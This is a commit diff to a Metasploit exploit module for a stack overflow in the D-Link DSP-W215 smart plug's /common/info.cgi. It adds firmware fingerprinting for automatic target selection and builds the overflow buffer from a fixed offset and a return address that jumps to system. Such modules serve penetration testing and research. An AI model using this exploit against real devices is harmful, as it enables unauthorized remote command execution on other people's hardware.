auto target

2014-07-09 21:53:11 +02:00 · 2014-07-09 21:53:11 +02:00 · f068006f05
parent f89f47c4d0
commit f068006f05
1 changed files with 41 additions and 5 deletions
--- a/modules/exploits/linux/http/dlink_dspw215_info_cgi_rop.rb
+++ b/modules/exploits/linux/http/dlink_dspw215_info_cgi_rop.rb
@ -35,7 +35,12 @@ class Metasploit3 < Msf::Exploit::Remote
        ],
      'Targets'        =>
        [
-          [ 'D-Link DSP-W215',
+          #
+          # Automatic targeting via fingerprinting
+          #
+          [ 'Automatic Targeting', { 'auto' => true }  ],
+
+          [ 'D-Link DSP-W215 - v1.02',
            {
              'Offset'      => 477472,
              'Ret'         => "\x00\x40\x5C\xEC",    # jump to system - my_cgi.cgi
@ -52,10 +57,33 @@ class Metasploit3 < Msf::Exploit::Remote
        'uri' => "/common/info.cgi",
        'method'  => 'GET'
      })
-
      if res && [200, 301, 302].include?(res.code)
-        return Exploit::CheckCode::Detected
+
+        # trying to automatically detect a vulnerable device
+        # I think there are other vulnerable devices out there
+        # Todo: Check more devices and create some more targets
+        if (target['auto'])
+          if res.body =~ /DSP-W215A1/ && res.body =~ /1.02/
+
+            self.targets.each do |t|
+              if (t.name =~ /DSP-W215.*1.02/) then
+                @mytarget = t
+                break
+              end
+            end
+          end
+
+          print_status("#{peer} - Selected Target: #{@mytarget.name}")
+          print_good("#{peer} - detected a vulnerable device")
+          return Exploit::CheckCode::Detected
+
+        # no auto-targetting ... the user is responsible
+        else
+          print_good("#{peer} - detected a device with unknown exploitability ... trying to exploit")
+          return Exploit::CheckCode::Detected
+        end
      end
+
    rescue ::Rex::ConnectionError
      return Exploit::CheckCode::Unknown
    end
@ -63,9 +91,17 @@ class Metasploit3 < Msf::Exploit::Remote
    Exploit::CheckCode::Unknown
  end

+  def target
+    return @mytarget if @mytarget
+    super
+  end
+
  def exploit
    print_status("#{peer} - Trying to access the vulnerable URL...")

+    # Use a copy of the target
+    @mytarget = target
+
    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
    end
@ -78,8 +114,8 @@ class Metasploit3 < Msf::Exploit::Remote
  end

  def prepare_shellcode(cmd)
-    buf = rand_text_alpha_upper(target['Offset'])   # Stack filler
-    buf << target['Ret']                            # Overwrite $ra -> jump to system
+    buf = rand_text_alpha_upper(@mytarget['Offset'])   # Stack filler
+    buf << @mytarget['Ret']                            # Overwrite $ra -> jump to system

           # la $t9, system
           # la $s1, 0x440000